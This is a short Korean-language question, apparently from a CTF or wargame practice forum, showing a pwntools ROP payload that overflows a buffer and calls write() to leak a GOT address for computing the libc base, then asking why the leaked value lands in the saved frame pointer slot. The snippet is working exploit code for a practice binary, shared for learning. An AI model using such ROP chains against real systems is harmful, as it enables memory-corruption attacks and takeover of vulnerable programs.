`#libc_base 주소를 찾기 위해 write()함수로 write_got 값을 출력
payload = b'A' * 0x40 + b'B' * 0x8
#payload += p64(ret)
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15) + p64(write_got) + p64(0)
payload += p64(write_plt)
payload += p64(main)

p.sendline(payload)`
이런식으로 해서 풀긴 했는데, 최종적으로 LEAK값이 SFP 부분에 쓰여지는 이유를 모르겠습니다.